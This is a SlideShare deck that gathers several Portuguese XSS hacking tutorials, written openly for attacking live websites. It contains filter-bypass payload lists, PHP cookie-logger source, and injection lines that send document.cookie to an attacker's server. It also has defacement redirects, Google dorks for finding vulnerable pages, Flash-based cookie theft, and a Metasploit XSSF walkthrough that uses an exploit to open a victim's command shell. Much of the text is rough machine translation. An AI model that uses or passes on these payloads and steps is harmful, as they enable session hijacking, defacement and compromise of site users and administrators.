XSS INJECTION
BASICO XSS

O que é Cross Site Scripting (XSS)?
Cross Site Scripting permite que você insira um código malic...
Noções básicas de XSS

Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir:

Citação:
<script>alert...
Citação:
http://database.delete.com/search.php?q=<br><br><b><u>something</u></b>
Você deverá ver um texto em negrito na pá...
O método mais utilizado de XSS é o roubo de cookies.
Primeiro obtenha uma cookielogger.php (irá anexá-lo!)

Ok, agora temo...
percebe o redirecionamento para o servidor?

Fácil … tudo que você precisa é de uma String para ASCII Converter e as
carac...
diferente.

Citação:
<script>alert(“Example”)</script>
seria

Citação:
‘)alert(“Example”);

ROUBO DE COOKIES
Olá amigos do...
Aqui está o wikipedia diz:
Cross-site scripting (XSS) é um tipo de computador vulnerabilidade de segurança
normalmente enc...
Agora você pode ver seu script de uma forma muito simples, portanto, incluída no script
script tags.The é alertar uma mens...
códigos e introduza-o se você sabe alguma codificação de sorriso
Aqui são pedaços de código mais alguns que eu encontrei n...
22
23
24
25
26
27
28
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83)) </script>
'><script>al...
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83)...
Citação:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<?php

if(strlen($_SERVER['QUERY_STRING']) > 0) {
$fp=fopen('./CookieLog.txt', 'a');
fwrite($fp...
var SAFECHARS = "0123456789" + // Numeric
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic
"abcdefghijklmnopqrstuvwxyz" +
"-_....
encoded += HEX.charAt(charCode & 0xF);
}
}
} // for

return encoded;
};

cookie = URLEncode(document.cookie);
html = '<img...
fazer um monte!

Deface

Então agora podemos desfigurar a website.Isso é, a publicação que você ganhou
controle sobre o si...
/ =% 2f

Ignorando ASCII

Com uma criptografia ASCII, podemos usar o caractere "Qual é bloqueado um pouco
Este é um dos o ...
1
<script> alert ("XSS") </ script>
Você também pode misturar isso com criptografia ASCII se você gosta. Este tipo de
ciru...
ACESSO AO PROMPT DO ALVO POR XSS
Explorando XSS

XSS (ou CSS, sem confundir com a linguagem para webdesign) é uma vulnerab...
obtém e os grava. Veja um exemplo:
Crie, no T35 (ou no servidor de sua preferência), um script em PHP desta maneira:
Códig...
echo "<script> window.close(); </script>"; // fecha a janela

exit; // pronto
?>
Claro que não se faz apenas com PHP. Se v...
amigo Metasploit e seu parceiro framework chamado XSSF. Baixamos este último e o
extraímos no diretório de instalação do M...
ler seus cookies, acessar sua área de transferência, e muito mais. Vamos, por exemplo,
invadir o prompt de comando da víti...
C:Documents and Settings[alvo]>_
Como vimos, acessamos o prompt de comando do alvo. Lembrando que para isso o
alvo precisa...
Código:
getURL('javascript:alert("oi")');
Aqui fizemos somente o básico: mostramos uma caixa de mensagem escrito “oi”. Mas...
Citação:
http://seusite/arquivo.swf#alert(“oi”);
Lembrando que salvando como arquivo do Flash ele não irá abrir corretamen...
XSS EM MURAL DE SITES

Esse medoto é velho mais funfa ,
se tiver outro topico igual aqui podem excluir este =)

mural é a ...
ai voce vai la pra postar o recado

e coloca

<script type="text/javascript">//
window.location.href="http://myips.110mb.c...
Upcoming SlideShare
Loading in …5
×

Xss

958 views

Published on

  • Be the first to comment

  • Be the first to like this

Xss

  1. 1. XSS INJECTION BASICO XSS O que é Cross Site Scripting (XSS)? Cross Site Scripting permite que você insira um código malicioso em uma aplicação web. (quase com um código javascript, mas também é possível inserir outros códigos como PHP ou HTML. É uma vulnerabilidade que está em quase todos os site que você pode encontrar na WWW. Além disso, vou falar sobre 2 maneiras diferentes de usar XSS … 1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página. 2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o atacante irá escolher um site com alguns campos “input”, como shoutboxes, blogs e guestbooks. Encontrando vulnerabilidades XSS 1. Http://www.google.com Visite 2. Use “dorks Google”, como search.php? Q = 3. Encontrado o “direito” site para injetá-lo.
  2. 2. Noções básicas de XSS Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir: Citação: <script>alert(“something”)</script> Se você executá-lo, ele irá aparecer uma caixa de mensagem que vai dizer “alguma coisa”. Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS. Basta olhar: Citação: http://database.delete.com/search.php?q=<script>alert(“something”)</script> Isso foi um exemplo para um XSS com javascript. Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar para executar um XSS. Aqui está um exemplo de uma injeção HTML: Citação: <br><br><b><u>something</u></b> Será algo como:
  3. 3. Citação: http://database.delete.com/search.php?q=<br><br><b><u>something</u></b> Você deverá ver um texto em negrito na página, se a página é vulnerável a XSS. Defacment com XSS Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes códigos: Citação: <IMG SRC=”http://mywebsite.com/defacmentpic.jpg”> = Irá incluir uma imagem Citação: <EMBED SRC=”http://mywebsite.com/deface.swf” = Incluirá um vídeo em Flash Citação: <embed src=”deface.mid” hidden autostart=”true” loop=”false” /> = Vai incluir um arquivo de música em modo oculto Citação: <script>window.open( “http://www.XXXXXXX.net/” )</script> = Redireccionado para outro site, neste caso “XXXXXXXXXXXX.net” Roubar cookies usando XSS
  4. 4. O método mais utilizado de XSS é o roubo de cookies. Primeiro obtenha uma cookielogger.php (irá anexá-lo!) Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um log.txt onde seus logs serão armazenados. Certifique-se que ele funciona! Procura um site vuln e insira o seguinte código: (substitui-lo com suas informações) Citação: document.location = “http://myserver.com/cookielogger.php?c=”+document.cookie Agora, se o usuário visite o site da sua cookies serão roubados e enviados para o seu CookieLogger. Analisar o madeireiro para seus cookies e sequestrar a sua sessão. Mas o que é se o site não possui uma função tal loja? Veja … Citação: http://website.com/search.php?q=document.location = “http://myserver.com/cookielogger.php?c=”+document.cookie Você será redirecionado ao site original para o servidor. (você deve cripta “a seqüência de URL, porque a sua vítima poderia observar o código malicioso incluído para o original URL) Mas como “crypt” esse código para se tornar “normal”, de modo que sua vítima não
  5. 5. percebe o redirecionamento para o servidor? Fácil … tudo que você precisa é de uma String para ASCII Converter e as características da função () (Http://www.easycalculation.com/ascii-hex.php) Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII. Citação: <script>alert(“Example”)</script> é igual Citação: 60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62 Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como esta: Citação: 60,115,99,114,105, [...] Finished! Você crypted seu código malicioso a um “código” malicioso escondido: D! Ignorando Filtros Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens? Hm, temos de encontrar outro método … basta escrever o código de uma maneira
  6. 6. diferente. Citação: <script>alert(“Example”)</script> seria Citação: ‘)alert(“Example”); ROUBO DE COOKIES Olá amigos do INW, confiram este tutorial enviado por aratorny sobre XSS. Primeiro de tudo, eu traduzi ele no google e mudei algumas coisas, mais acho que deu pra entender, até porquê, eu aprendi a fazer XSS assim.. Espero que gostem!. Aqui está um outro tutorial escrito por XSS mim. Começarão aprendizagem de hackers comigo. Vou tentar fazer isso o mais breve possível, abrangendo apenas o básico para que ele ajuda a noobs a entender ;p Então vou começar como sempre O que é XSS?
  7. 7. Aqui está o wikipedia diz: Cross-site scripting (XSS) é um tipo de computador vulnerabilidade de segurança normalmente encontrados em aplicações web que permite que atacantes para injetar client-side script em páginas da Web vistos por outros usuários. Um cross-site scripting vulnerabilidade pode ser usada por crackers para contornar os controles de acesso, como a política de mesma origem. Cross-site scripting realizadas em sites responderam por aproximadamente 80,5% de todas as vulnerabilidades de segurança documentadas pela Symantec a partir de 2007. [1] O seu efeito pode variar de um incômodo pequeno para um risco de segurança significativo, dependendo da sensibilidade dos dados manipulados pelo o site vulnerável ea natureza de qualquer atenuação de segurança implementada pelo proprietário do site. Ataque! Assim, nesta seção iremos aprender como usar XSS para ganhar controle sobre alguns website.So isto é para um noob real, que não sei nada sobre isso Sorrindo Assim como em todos os hackers outro, XSS também começa por encontrar uma vulnerability.But você pode precisar fazer várias coisas para saber se um site é realmente vulnerável. Então, em primeiro lugar, lembre-se this.A site que tem algo como uma caixa de pesquisa, espaço de login ou qualquer coisa semelhante é mais vulnerável XSS. Portanto, para este primeiro ataque, nós estaremos usando uma caixa de pesquisa. Então coloque este pequeno pedaço de código na caixa e pressione Enter Sorridente Citação: 1 <script>alert("XSS")</script>
  8. 8. Agora você pode ver seu script de uma forma muito simples, portanto, incluída no script script tags.The é alertar uma mensagem simples, XSS.Now se uma pequena caixa pop uped dizendo XSS, parabéns! Seu site é vulnerável! Agora, se nada aparecer, isso significa que o site tem filtrado filtro it.This pode ser facilmente contornado por us.There muitos tipos de filtros e na maioria das vezes, o seu bloqueio da caixa de alerta. Assim, em seu código, você encerrou a mensagem “XSS” em dupla quotes.So o sistema sabe que você está tentando XSS hackers desde que foi fechado em quotes.So dupla temos para criptografar a nossa mensagem para enganar o sistema inteligente? Então, agora usamos uma função pouco chamado “String.fromCharCode” Então, o que isso faz é criptografar o nosso texto para linguagem ASCII .. Aqui está um exemplo de como parece.: Citação: String.fromCharCode(88,83,83) Agora 88,83,83 são valores ASCII para XS S.Check este link para saber a tabela de conversão. http://www.ascii.cl/ Não é necessário que Toungee Então, agora digite o código recém-formatado na caixa de busca e aperte enter. Citação: 1 <script>alert(String.fromCharCode(88,83,83))</script> A coisa especial é que você não precisa usar aspas, neste caso, uma vez que esta função é usada Agora você deve obter a caixa pop-up na maioria dos casos. Else há muitos pedaços de código outros que você pode inserir yourself.You pode fazer
  9. 9. códigos e introduza-o se você sabe alguma codificação de sorriso Aqui são pedaços de código mais alguns que eu encontrei na net que você pode usar para fazer isso: Citação: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
  10. 10. 22 23 24 25 26 27 28 "><script>alert("XSS")</script> "><script>alert(String.fromCharCode(88,83,83)) </script> '><script>alert("XSS")</script> '><script>alert(String.fromCharCode(88,83,83))</script> <ScRIPt>aLeRT("XSS")</ScRIPt> <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> "><ScRIPt>aLeRT("XSS")</ScRIPt> "><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt> '><ScRIPt>aLeRT("XSS")</ScRIPt> '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> </script><script>alert("XSS")</script> </script><script>alert(String.fromCharCode(88,83,83) )</script> "/><script>alert("XSS")</script> "/><script>alert(String.fromCharCode(88,83,83))</script> '/><script>alert("XSS")</script> '/><script>alert(String.fromCharCode(88,83,83))</script> </SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,8 3)) </SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
  11. 11. </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT> ";alert("XSS");" ";alert(String.fromCharCode(88,83,83));" ';alert("XSS");' ';alert(String.fromCharCode(88,83,83));' ";alert("XSS") ";alert(String.fromCharCode(88,83,83)) ';alert("XSS") ';alert(String.fromCharCode(88,83,83)) Essas consultas só deve ser capaz para você cortar qualquer tipo de websites.Even dos maiores sites pode estar tendo algumas vulnerabilidades XSS que você pode encontrar com estes idiotas. Avançado XSS Agora vamos aprender a usar essas coisas para atacar websites.Keep em mente que isso é completamente ilegal e você pode ser pego e pode ser cobrado por crime para fazer this.So tomar precauções sempre. Roubar Cookies Então, agora vamos usar o método Cookies roubar para fazer o attack.It é um tipo especial de biscoito / logger que registra o usuário que acessa esse page.So existem muitas maneiras de fazer isso, mas aqui é um método fácil. Portanto, neste método, você precisará configurar um website.So ir para algum sites.I hospedagem preferem http://www.000webhost.com e criar uma conta no que website.Go para gerenciador de arquivos e criar um novo arquivo de texto em it.Name ele qualquer coisa como cookielog.txt ou algo parecido t that.Don ‘enter nada para ele it.Leave blank.Create outro arquivo txt e nomeie-o algo cookiellogger.txt.So exemplo different.For iremos adicionar algum código em -lo para que ele possa enviar logs para o file.So cookielog.txt abrir o arquivo de texto 2 e digite este código:
  12. 12. Citação: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
  13. 13. 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49
  14. 14. 50 51 52 53 54 55 56 57 58 <?php if(strlen($_SERVER['QUERY_STRING']) > 0) { $fp=fopen('./CookieLog.txt', 'a'); fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."n"); fclose($fp); } else { ?> var ownUrl = ' echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>'; function URLEncode(str) { // The Javascript escape and unescape functions do not correspond // with what browsers actually do...
  15. 15. var SAFECHARS = "0123456789" + // Numeric "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic "abcdefghijklmnopqrstuvwxyz" + "-_.!~*'()"; // RFC2396 Mark characters var HEX = "0123456789ABCDEF"; var plaintext = str; var encoded = ""; for (var i = 0; i < plaintext.length; i++ ) { var ch = plaintext.charAt(i); if (ch == " ") { encoded += "+"; // x-www-urlencoded, rather than %20 } else if (SAFECHARS.indexOf(ch) != -1) { encoded += ch; } else { var charCode = ch.charCodeAt(0); if (charCode > 255) { alert( "Unicode Character '" + ch + "' cannot be encoded using standard URL encoding.n" + "(URL encoding only supports 8-bit characters.)n" + "A space (+) will be substituted." ); encoded += "+"; } else { encoded += "%"; encoded += HEX.charAt((charCode >> 4) & 0xF);
  16. 16. encoded += HEX.charAt(charCode & 0xF); } } } // for return encoded; }; cookie = URLEncode(document.cookie); html = '<img src="'+ownUrl+'?'+cookie+'">'; document.write(html); < ?php } ?> Então esse é o script.Agora no cookielogger precisamos mandar essa mensagem para o administrador do site website.So alvo mais provavelmente o administrador não vai olhar it.Since temos que convencê-lo, vamos encurtar o url.Go para www.spam.com/ e encurtar a sua URL.And já que queremos adicionar vulnerabilidade, precisamos adicionar algum código também. Então, adicione este código após a URL e reduzi-lo. Citação: 1 <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script> Envie o link para o administrador e esperar para que ele clique it.You precisa ter sorte para o administrador clicar nele Uma vez que ele clicou, você terá a cookie.Now você pode usar algumas ferramentas como o addon gerenciador de cookies que você começa para Mozilla e jogar em torno dele. Sua addon muito bom e realmente ajuda a
  17. 17. fazer um monte! Deface Então agora podemos desfigurar a website.Isso é, a publicação que você ganhou controle sobre o site fazendo uma página de desfigurar ou something.Now você precisa usar um pequeno script para redirecionar todo mundo que visita o site para a página de desfigurar. Citação: 1 <script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script> Substitua a sintaxe com a sua página desfigurar site. Ignorando o filtro XSS Assim, na maioria das vezes, o simples script não vai dar o pop-up message.It costuma ignorar o filter.So você tem que usar algum outro methods.I irá discutir alguns deles abaixo. Hex Bypass ( Ignorar ) Com personagens bloqueados como>, <, e /, é muito difícil de executar uma consulta de XSS. Não se preocupe, há sempre uma solução Sorrindo Você pode mudar seus personagens, em hexadecimal. A Hex de um determinado personagem, é basicamente o personagem, mas em um formato diferente. Estes devem ajudá-lo: > =% 3c <=% 3c
  18. 18. / =% 2f Ignorando ASCII Com uma criptografia ASCII, podemos usar o caractere "Qual é bloqueado um pouco Este é um dos o filtro XSS mais comum ignora de todos os tempos Um script que você precisa para criptografar, ficaria assim...: Citação: 1 <script>alert("XSS")</script> E esta deve estar funcionando: Citação: 1 <script> alert ("XSS") </ script> Para criptografar a sua pequena parte de um script, vá a este site: http://www.wocares.com/noquote.php Ignorando Case-Sensitive Este tipo de cirurgia raramente funciona, mas vale sempre a pena um tiro. Alguns filtros são definidos no local para detectar determinadas seqüências, no entanto, as cordas do filtro que são bloqueados são caso sensível. Então, tudo o que precisamos fazer é executar um script, com diferentes tamanhos de caracteres. Este desvio, ficaria assim: Citação:
  19. 19. 1 <script> alert ("XSS") </ script> Você também pode misturar isso com criptografia ASCII se você gosta. Este tipo de cirurgia só funciona em filtros realmente estúpido, ou aqueles realmente muito velho. E por último, eu estou dando alguns idiotas XSS que você pode experimentar no Google. Citação: 1 2 3 4 5 6 inurl: search.php? inurl: find.php? inurl: search.html inurl: find.html inurl: Search.aspx inurl: find.aspx Obrigado por ler... Tradução & Edit: Aratorny Conteúdo: Rain112 Postado por: aratorny
  20. 20. ACESSO AO PROMPT DO ALVO POR XSS Explorando XSS XSS (ou CSS, sem confundir com a linguagem para webdesign) é uma vulnerabilidade que permite ao atacante ter acesso à modificação de uma determinada área da página. Sua detecção geralmente é feita incluindo, na variável supostamente vulnerável, um código JavaScript (client-side, ou seja, trabalha no lado do cliente) que apenas mostra uma caixa de alerta com o texto “XSS”. Veja: Código: 1 <script> alert("xss"); </script> Esta falha pode ocorrer, por exemplo, em formulários de busca (onde é mais comum) e em diferentes casos, como em um simples redirecionamento (como na maioria dos grandes mecanismos de pesquisa, como o Google). Desta falha, há 2 tipos: Reflected (refletido): Executa-se apenas para o cliente vítima do ataque, que deve incluir engenharia social. Stored (estocado/permanente): Fica gravado em um banco de dados e executa-se a quem abrir a página. Comum em fóruns, páginas de recados e livros de visitas. Por que você exploraria uma falha como essa? Por que você participa de um fórum ou rede social onde todos tem sua conta, cada qual com seus privilégios, e você quer escalá-los. Neste caso, pode ser feito um código que obtém os cookies do navegador e os envia para algum script seu, via GET, que os
  21. 21. obtém e os grava. Veja um exemplo: Crie, no T35 (ou no servidor de sua preferência), um script em PHP desta maneira: Código PHP: 1 2 3 4 5 6 7 8 9 10 11 12 13 <?php $cookies = $_SERVER['QUERY_STRING']; // obtém-se tudo o que há depois de "?" na URL $grava = fopen("hackeds.txt", "a+"); // abre-se um arquivo para escrita fwrite($grava, $cookies . "n n n"); // grava-se os cookies neste arquivo e pula 3 linhas para organização fclose($grava); // fecha o arquivo
  22. 22. echo "<script> window.close(); </script>"; // fecha a janela exit; // pronto ?> Claro que não se faz apenas com PHP. Se você trabalha em outra linguagem, boa sorte e vá aos estudos. Porém, PHP é uma linguagem mais comumente usada e fácil de se aprender. Agora, como você conseguirá obter esses cookies? Simples: Código: 1 <script> window.open("http://seusite/seuscript.php?"+document.cookie); </script> Mas, e se o alvo não permite que você inclua códigos JavaScript? Tente resolver com isso e com alguns outros métodos (pesquise…). Quer outra razão para explorar essa falha? Falsificar um site e conseguir alguma informação, como um login e uma senha, de um usuário. Por exemplo, se o formuário de busca de um banco possui uma falha, e você quer conseguir informações privilegiadas, mas não quer simplesmente criar um fake no T35, para não mudar o domínio, uma sugestão é (para não falar “você pode”) criar um formulário ali mesmo, com um action para uma página em um servidor de sua preferência. E, claro, encriptar um pouco a URL ou usar encurtador de links (se mudar o domínio não for atrapalhar) será interessante. Outra razão é um deface. Dependendo da localização onde está a falha, você pode escrever (com document.write()) um iFrame ou usar um location.href para redirecionar a página. Mas, se a localização da falha é dentro de um frame, há formas de burlar isso. Veja: Código: 1 <script> if (window!= top) { top.location.href=location.href; } </script> Quer ainda outra razão? Invadir o computador de alguém! Para isso, usaremos o nosso
  23. 23. amigo Metasploit e seu parceiro framework chamado XSSF. Baixamos este último e o extraímos no diretório de instalação do Metasploit? Agora vamos abrir a console do Metasploit (sempre digo que consoles te dão mais poder de fogo do que interfaces gráficas, entre tantas razões, o gasto de memória, por exemplo). Vamos então fazer o Metasploit reconhecer o framework, usando o comando “load”. Código: 1 load XSSF Este comando abrirá um servidor em seu computador com um código JavaScript para ser executado no cliente. Neste caso, ele nos retornou, nas últimas linhas: Código: 1 2 Please, inject 'http://SEU.IP.AQ.UI:88888/loop' resource in an XSS Successfully loaded plugin: XSSF Então, usaremos a URL “http://SEU.IP.AQ.UI:88888/loop”. Após injetá-lo da maneira que quiser (ou que puder), veremos quem caiu, ou melhor, se conectou, usando o seguinte comando em nosso console: Código: 1 xssf_active_victims E ele nos retornou os endereços IP’s de quem se conectou, se ainda está conectado, o seu navegador e a versão e o suporte a cookies. E ele nos alerta também que podemos usar o comando xssf_information [VictimID] para ver mais informações sobre uma vítima. Pegamos o ID da vítima dado na tabela do comando anterior e usamos o comando. Ali vemos ainda seu sistema operacional, a arquitetura de sua máquina, a URL em que está agora e as informações vistas anteriormente, além de outras. Ainda podemos executar códigos JavaScript em tempo real. Faremos uma caixa de alerta, por exemplo, usando o módulo Auxiliary XSSF Alert. Além disso, ainda podemos
  24. 24. ler seus cookies, acessar sua área de transferência, e muito mais. Vamos, por exemplo, invadir o prompt de comando da vítima. Vamos usar o exploit ms10_046_shortcut_icon_dllloader para isso. Veja o processo da digitação: Código: 1 2 3 4 5 6 use windows/browser/ms10_046_shortcut_icon_dllloader jobs xssf_active_victims xssf_exploit 7 0 sessions -i l shell Com esses simples comandos, dizemos ao Metasploit para fazer uma espécie de ligação com o exploit, vemos os trabalhos ativos, as vítimas do nosso XSS e, alguns comandos a mais, abrimos o shell, e veja o resultado final: Código: 1 2 3 4 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
  25. 25. C:Documents and Settings[alvo]>_ Como vimos, acessamos o prompt de comando do alvo. Lembrando que para isso o alvo precisa estar com Internet Explorer (ou, da minha maneira, IEca). Para fazer um teste (o alvo estava ciente, já que era minha máquina virtual), usava Debian Linux (de onde partiram as versões Ubuntu – Debian 3, e Educacional – Debian 2 com GUI KDE). A máquina tem 1 GB de RAM (dos quais 350 são para o Windows XP virtualizado). Até a próxima! TUTORIAL USANDO XSS EM FLASH O seu alvo não possui uma vulnerabilidade clara de XSS Stored, onde você possa incluir JavaScript. Aparentemente, não possui falha nenhuma em web, mas naquele livrinho de visitas ou recados (e fórum) eles te deixaram incluir Flash. Tudo bem. Como eu vou aproveitar isso? Não vou poder ter acesso ao servidor com isso, visto que Flash é um client-side. Ôpa!, client-side? JavaScript também é! Legal! Vou mostrar aqui o que eu aprendi depois de um tempo de conversa com o pink noise, agora super administrador do FH, logo após ter ownado o fórum adversário. Ele me contou um pouco sobre a falha explorada para esta ação. Antes da conversa, o que eu entendia de Flash se resumia em “absolutamente nada”. Eu tinha o Macromedia Flash PRO 8 instalado na máquina e parado. Claro que ainda não entendo quase nada de Flash, mas isso já é o suficiente para aprender a explorar essa falha. Primeiro, certifique-se de ter o Flash e Action Script 2 (ou superior) em sua máquina. Você pode baixá-lo aqui (não dou muita garantia deste link. Baixe por sua própria conta e risco). Agora, vamos fazer nosso primeiro teste com o comando geturl.
  26. 26. Código: getURL('javascript:alert("oi")'); Aqui fizemos somente o básico: mostramos uma caixa de mensagem escrito “oi”. Mas já iniciamos no JS em SWF. Mas, segundo o próprio pink noise, usar geturl() pode nos limitar. Não sei o porquê, mas quem sou eu pra duvidar, já que tudo o que sei sobre Flash se resume nestas linhas? Neste caso ele me sugeriu fazer o seguinte: Código: import flash.external.ExternalInterface; ExternalInterface.call("function(){ alert('oi'); }", ""); Note que você deverá trocar o alert(‘oi’); pelo código JS que quiser. Veja alguns exemplos: Código: import flash.external.ExternalInterface; ExternalInterface.call("function(){ location.href = 'http://seusite/pegadados.php? dado='+document.cookie; }", ""); Código: import flash.external.ExternalInterface; ExternalInterface.call("function(){ document.write('&lt;iframe src=http://seusite/own.html width=100% height=100%&gt;&lt;/iframe&gt;'); }", ""); Isto também é interessante: Note que nos exemplos acima, o nosso arquivo fará o préprogramado. Mas, seria legal usar um arquivo universal com o comando que você quiser na hora, não é? Assim, usando um encurtador de links, fica melhor e mais rápido. Para isso, faça o seguinte: Código: getURL('javascript:eval(document.location.hash.substr(1))'); Assim, você acessaria:
  27. 27. Citação: http://seusite/arquivo.swf#alert(“oi”); Lembrando que salvando como arquivo do Flash ele não irá abrir corretamente. Para isso você deve exportá-lo para SWF (File > Export > Export movie, podendo variar). Como explorar isso? Veja pelos exemplos. Dependendo da localização onde estará seu arquivo, não é interessante ownar de primeira metendo um iframe. Seria mais inteligente adquirir os cookies dos usuários e, possivelmente, de um usuário privilegiado. Pode também ser usado como um simples XSS Reflected, para enganar o alvo pelo domínio. Outra: dependendo da versão de seu Action Script, é necessário colocar, antes do código: Código: class Main { static function main(){ E depois: Código: } } Isto é tudo, pessoal! Moral da história: não permita o uso de <embed> no filtro HTML. Se você precisar inserir vídeos, empregue um dos módulos que inserir vídeos de fontes confiáveis e impedir a interação script. AUTOR: 0KaL
  28. 28. XSS EM MURAL DE SITES Esse medoto é velho mais funfa , se tiver outro topico igual aqui podem excluir este =) mural é a pagina onde fica os recados dos visitantes do site. www.site.com.br/mural.php ” /muralderecados.php pode ser diversos jeitos, ai vai tar la pra voce postar seu recados ou comentario, ai você vai colocar uma alerta prencha os campos nome email claro que vai ser com dados falsos xD ai na mensagem você coloca <script type="text/javascript">// alert("textoaki") // ]]>> se aparecer uma alerta com os seu texto é porque ta vul ai voce vai fazer para redirecionar para a sua index que esta modificada
  29. 29. ai voce vai la pra postar o recado e coloca <script type="text/javascript">// window.location.href="http://myips.110mb.com/dilluvium.html"; // ]]>> ali ta a minha index você coloca a sua e a pagina vai passar a redirecionar para seu site =) para achar sites coloquei no google inurl:”mural.php” inurl:”recados.php” inurl:”muralderecados.php” Nao se esqueça do proxy Espero que tenham entendido , nao sou muito bom com explicações..huauhau Flwss

×